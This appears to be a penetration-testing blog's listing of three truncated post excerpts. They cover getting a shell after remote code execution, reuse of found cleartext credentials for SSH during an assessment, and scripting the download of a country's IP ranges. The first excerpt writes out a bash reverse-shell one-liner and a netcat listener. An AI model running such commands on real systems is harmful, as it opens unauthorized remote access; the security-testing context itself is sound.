Context, context, context; Alright, imagine this – you’re on an engagement, find a few vulnerabilities, run a few exploits and next thing you know you have Remote Code Execution (RCE). Now, like muscle memory, your next instinct would be to get a shell. Running the following is fairly simple: sh -i >& /dev/tcp/10.0.0.22/4678 0>&1 Then listen in and… nc -lvnp 4678 ... Huh? Sorry, I mean run this, and… 0<&196;exec…
A while back, after some live music and drinks at Railways, I made my way to another city for pleasant weather, some dubious food, the ever-wakeful seagulls, and ultimately – an assessment. After playing around for a few days, Jason and I had obtained access to a system which contained cleartext credentials, namely ihsadmin:ihsadmin. Using these credentials, we were also able to SSH into a management server of sorts. While…
Javier had a simple shell script he posted to our internal chat a few days ago. Its goal was to pull all the IP ranges for a country in preparation for a footprint from https://ipinfo.io/ (Let’s use PL as an example). Given this involved pulling multiple webpages, I was interested to know what the most efficient approach to this in the shell would be. Truthfully, the actual problem, pulling data…